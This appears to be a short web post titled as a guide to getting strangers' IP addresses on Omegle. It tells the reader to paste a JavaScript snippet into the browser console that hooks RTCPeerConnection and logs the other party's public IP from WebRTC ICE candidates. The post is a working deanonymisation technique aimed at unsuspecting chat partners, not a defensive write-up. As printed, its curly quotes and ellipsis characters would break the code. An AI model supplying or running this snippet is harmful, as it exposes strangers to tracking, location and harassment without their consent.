HOW TO GET PEOPLE FROM OMEGLES IP ADDRESS!!!
Steps:
Go to: https://www.omegle.com/
Press Control+Shift+I
Click on Console
Press Control+L or Just Click Clear Console
Paste this:
window.oRTCPeerconnection = window.oRTCPeerConnection || window.RTCPeerConnection
window.RTCPeerConnection = function(…args) {
const pc = new window.oRTCPeerconnection(…args)
pc.oaddIceCandidate = pc.addIceCandidate
pc.addIceCandidate = function(iceCandidate, …rest) {
const fields = iceCandidate.candidate.split(‘ ‘)
if (fields[7] === ‘srflx’) {
console.log(‘IP Address:’, fields[4])
}
return pc.oaddIceCandidate(iceCandidate, …rest)
}
return pc
}
Press Enter
Clear Console Again
Click Video or Text
Addresses should be on the right side of the screen
ip address